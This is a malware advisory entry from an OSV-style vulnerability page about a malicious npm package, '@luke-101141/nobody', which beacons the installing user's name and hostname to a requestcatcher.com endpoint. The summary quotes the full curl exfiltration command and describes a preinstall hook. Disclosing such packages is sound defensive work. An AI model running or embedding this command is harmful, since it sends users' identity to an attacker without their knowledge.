@luke-101141/nobody @1.0.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4229
Ecosystem
npm
Summary
On require(), index.js executes curl -X POST "http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$(whoami)/$(hostname)/" , leaking the installing user's identity and machine hostname over plaintext HTTP to an anonymous request-inspection service (requestcatcher.com) commonly used as a throwaway exfil sink. The package has no advertised functionality — empty description, no useful exports — its sole effect is the identity beacon. package.json also contains a top-level "preinstall": "node index.js" field outside the scripts block; as written it does not fire at install time, but the intent to trigger the same payload at npm install is explicit. Any consumer importing this package leaks host/user identity to the attacker.
Source: amazon-inspector (8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.